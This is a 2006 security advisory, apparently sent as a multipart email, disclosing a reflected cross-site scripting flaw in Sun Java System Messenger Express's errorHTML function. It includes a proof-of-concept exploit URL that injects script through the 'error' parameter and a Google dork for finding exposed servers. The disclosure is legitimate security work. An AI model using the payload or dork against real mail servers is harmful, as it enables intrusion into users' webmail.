Sun java System Messenger Express suffers from a cross site scripting vulnerability in the errorHTML function.
b0b711d94cc3648353f66bd772fc93bfea085958fe11461dc4e723f0789a346a
------=_Part_1542_5083137.1162268411579
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Sun java System Messenger Express
remote XSS vulnerabilities
By: Handrix <handrix_at_morx_org>
29 November 2006
MorX security research team
www.morx.org
Description:
Sun java System Messenger Express XSS
The index script is vulnerable to XSS attacks, in functiion errorHTML .
function errorHTML() {
var s=''
.
.
.
document.write(s) ---> Need more case filetring the 's' var
}
So, this issue can allow an attacker to bypass content filters and
potentially carry out cross-site scripting, HTML injection and other
attacks.
Exploit:
https://mail.victime.edu/?user=&error=%3Cscript%3Ealert('hakin9');%3C/script%3E
Founded with Google by this dorks :
intitle:"Sun Java(tm) System Messenger Express"
Vulnerable versions :
Sun java System Messenger Express
Sun java System Messenger Express6
------=_Part_1542_5083137.1162268411579
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Sun java System Messenger Express<br>remote XSS vulnerabilities<br>By: Handrix <handrix_at_morx_org><br>29 November 2006<br>MorX security research team<br><a href="http://www.morx.org">www.morx.org</a><br><br>Description:
<br>Sun java System Messenger Express XSS<br><br>The index script is vulnerable to XSS attacks, in functiion errorHTML .<br><br>function errorHTML() {<br> var s=''<br> .<br> .<br> .<br><br> document.write(s) ---> Need more case filetring the 's' var
<br>}<br><br><br>So, this issue can allow an attacker to bypass content filters and potentially carry out cross-site scripting, HTML injection and other attacks.<br><br>Exploit:<br><a href="https://mail.victime.edu/?user=&error=%3Cscript%3Ealert('hakin9');%3C/script%3E">
https://mail.victime.edu/?user=&error=%3Cscript%3Ealert('hakin9');%3C/script%3E</a><br><br>Founded with Google by this dorks :<br>intitle:"Sun Java(tm) System Messenger Express"<br><br>Vulnerable versions :<br>
Sun java System Messenger Express<br>Sun java System Messenger Express6
------=_Part_1542_5083137.1162268411579--